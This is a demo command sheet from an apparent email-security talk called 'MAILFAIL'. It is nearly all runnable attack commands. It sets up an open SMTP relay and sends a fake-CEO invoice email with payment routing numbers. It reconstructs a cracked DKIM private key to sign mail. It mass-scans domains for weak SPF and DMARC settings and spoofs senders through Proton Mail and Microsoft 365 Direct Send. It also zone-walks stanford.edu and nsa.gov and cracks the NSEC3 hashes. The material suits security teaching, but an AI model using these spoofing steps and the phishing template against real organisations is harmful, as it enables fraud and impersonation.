MAILFAIL

Demo Commands - Part 2

• SPF and DMARC Bypass via SMTP Open Relaying

  # Here is a website that checks for SMTP open relaying
  https://tools.appriver.com/OpenRelay.aspx?server=209.38.78.151
  
  # Installing a postfix open relay
  sudo apt install postfix
  sudo nano /etc/postfix/main.cf
  # Add the following lines
  mynetworks = 0.0.0.0/0 127.0.0.0/8 [::ffff:127.0.0.0]/104 [::1]/128
  permit_mynetworks = yes
  # Restart postfix
  sudo service postfix restart
  
  # Nmap scanning for an open relay
  nmap -p 25,587,465 -v --open --script smtp-open-relay 209.38.78.151 | grep "Server is an open relay|MAIL FROM:" -B 6
  
  # Using the open relay
  telnet 209.38.78.151 25
  HELO smtprelay.me
  MAIL FROM: <jack@smtprelay.me>
  RCPT TO: <mymailfail42@gmail.com> 
  DATA
  Content-Type: multipart/mixed; boundary="NextMimePart"
  From: jack@smtprelay.me
  To: mymailfail42@gmail.com
  Subject: Did that invoice go out? 
  
  --NextMimePart
  Content-Type: text/html;
  
  Hey Mike, this is Jack, your CEO. Did you ever send out that invoice for the holiday party?
  If not, here are the routing numbers:
  1234567890
  
  I've attached the invoice for your convenience. You should get this done ASAP, or it will affect your performance review.
  
  Sincerely,
  Your Boss
  .
            

• Cracking DKIM RSA Keys

  dig TXT smtpapi._domainkey.m.ail.fail +short
  # https://gist.github.com/ACK-J/487d0de5737458d953ca818a0645b09b
  wget https://gist.githubusercontent.com/ACK-J/487d0de5737458d953ca818a0645b09b/raw/817e9d3c0faeb81844a4a81be6818d582ff493ea/Reconstruct_Private_RSA_Key.py
  # Private Key Values of p and q
  # 114243475724741248833595122844512882880944338610909134738011440161029226847479
  # 98382782872834099683871479139393781262822034994021043042450594450215266838447
  vim Reconstruct_Private_RSA_Key.py
  python3 Reconstruct_Private_RSA_Key.py
  cat > cracked_private_key.pem
  # https://gist.github.com/ACK-J/76585af46375641ec841cb6b77d345c3
  vim Send_DKIM_Email.py
  python3 Send_DKIM_Email.py
            

• Finding SPF/DMARC Misconfigs​

  # Downloading the script to check for DMARC and SPF misconfigurations
  wget https://gist.githubusercontent.com/ACK-J/8a189bafbb54e00fb1b3f3e22dcd81c9/raw/5ad366adf6abdaaf981fd8bede5223f543e4242c/DMARC_and_SPF_Check.py
  # Downloading a file of the top one million domain names
  wget https://downloads.majesticseo.com/majestic_million.csv
  # Formatting the file 
  cat  majestic_million.csv | tail -n +2 | cut -d ',' -f 3 > majestic_million.csv.txt
  # Running the script with the formatted file
  python3 DMARC_and_SPF_Check.py majestic_million.csv.txt
  
  # Showing that a domain's SPF record is pointing at my current IP address
  dig TXT spf.m.ail.fail +short
  # Showing my current IP
  curl ifconfig.me
  
  # Connecting to Proton Mail's email server
  # Spoof SPF
  # Take advantage of the domain's misconfigured SPF and DMARC records
  telnet mailsec.protonmail.ch 25
  HELO spf.m.ail.fail
  MAIL FROM: <jack@spf.m.ail.fail>
  RCPT TO: <mymailfail42@proton.me>
  DATA
  Content-Type: multipart/mixed; boundary="NextMimePart"
  To: mymailfail42@proton.me
  From: vader@starwars.com
  Subject: Your Inbox Has Fallen to the Dark Side
  
  --NextMimePart
  Content-Type: text/html;
  
  I find your email habits... disturbing.
  
  
  Effective immediately:
  
  - "Free lightsaber!" will trigger a full investigation by the Empire.
  
  
  
  May the inbox be with you. 
  
  Darth Vader
  
  Sith Lord & Email Administrator
  
  .
            

• Spoof Misconfigured DMARC and SPF

  # Open a cloud shell using portal.azure.com
  # get the MX record of the victim domain and substitute it below as the SMTP server
  # If your IP gets blocked by Spamhaus, restart cloud shell to get a new IP
  Send-MailMessage -SmtpServer example-com.mail.protection.outlook.com -To "Victim@example.com" -From "ceo@BadDMARC.com" -Subject "Misconfigured DMARC" -Body "Misconfigured DMARC" -BodyAsHTML -DeliveryNotificationOption Never -UseSsl
            

• Spoofing DMARC PCT!=100

  # Downloading the script to check for DMARC and SPF misconfigurations
  wget https://gist.githubusercontent.com/ACK-J/8a189bafbb54e00fb1b3f3e22dcd81c9/raw/5ad366adf6abdaaf981fd8bede5223f543e4242c/DMARC_and_SPF_Check.py
  # Downloading a file of the top one million domain names
  wget https://downloads.majesticseo.com/majestic_million.csv
  # Formatting the file 
  cat  majestic_million.csv | tail -n +2 | cut -d ',' -f 3 > majestic_million.csv.txt
  # Check for domains with pct= in the DMARC policy
  python3 DMARC_and_SPF_Check.py majestic_million.csv.txt | grep "less than 100%"
  
  # An easy way to send spoofed emails is with Cloud Shell on portal.azure.com
  
  # Replace the SMTP server and victim email below
  Send-MailMessage -SmtpServer example-com.mail.protection.outlook.com -To victim@example.com -From jack@epicgames.com -Subject "Howdy" -Body "Misconfigured DMARC" -BodyAsHTML -DeliveryNotificationOption Never -UseSsl
            

• Spoofing Internal Emails via Direct Send

  # Replace the SMTP server with a M365 MX record and the To and From fields
  Send-MailMessage -SmtpServer example-com.mail.protection.outlook.com -To victim@vulnerable.com -From ceo@vulnerable.com -Subject "Microsoft Direct Send Spoofing Test" -Body "Microsoft Direct Send Spoofing Test" -BodyAsHTML -DeliveryNotificationOption Never -UseSsl
            

• NSEC Walking

  # Install the dependencies
  sudo apt-get install pipx python3 python3-pip python3-dev gcc libssl3 libssl-dev
  # Install n3map using pipx
  pipx install n3map[predict]
  # NSEC walk Stanford
  n3map -v -A --output www.stanford.edu.zone stanford.edu
  # View the results
  vim www.stanford.edu.zone
            

• NSEC3 Walking and Cracking

  # Install the dependencies
  sudo apt-get install pipx python3 python3-pip python3-dev gcc libssl3 libssl-dev
  # Install n3map using pipx
  pipx install n3map[predict]
  # NSEC3 walk nsa.gov
  n3map -v -A --output nsa.gov.zone nsa.gov --predict
  # View the results
  vim nsa.gov.zone
  # Convert the results to hashcat format
  n3map-hashcatify nsa.gov.zone nsa.gov.hashcat
  # Crack the subdomains using hashcat
  hashcat --potfile-disable -m 8300 nsa.gov.hashcat /opt/wordlists/goldmine-2024-small.txt
            

• Spoofed Reply-To: Header

  # Showing that a domain's SPF record is pointing at my current IP address
  dig TXT spf.m.ail.fail +short
  # Showing my current IP
  curl ifconfig.me
  
  # Connect to protonmail's SMTP server
  # Spoof SPF
  # Include a Reply-To: header with a different email
  telnet mailsec.protonmail.ch 25
  HELO spf.m.ail.fail
  MAIL FROM: <jack@spf.m.ail.fail>
  RCPT TO: <mymailfail42@proton.me>
  DATA
  Content-Type: multipart/mixed; boundary="NextMimePart"
  To: mymailfail42@proton.me
  Reply-To: vader@starwars-corp.com
  From: vader@starwars.com
  Subject: Your Inbox Has Fallen to the Dark Side
  
  --NextMimePart
  Content-Type: text/html;
  
  I find your email habits... disturbing.
  
  
  Effective immediately:
  
  - "Free lightsaber!" will trigger a full investigation by the Empire.
  
  
  
  May the inbox be with you. 
  
  Darth Vader
  
  Sith Lord & Email Administrator
  
  .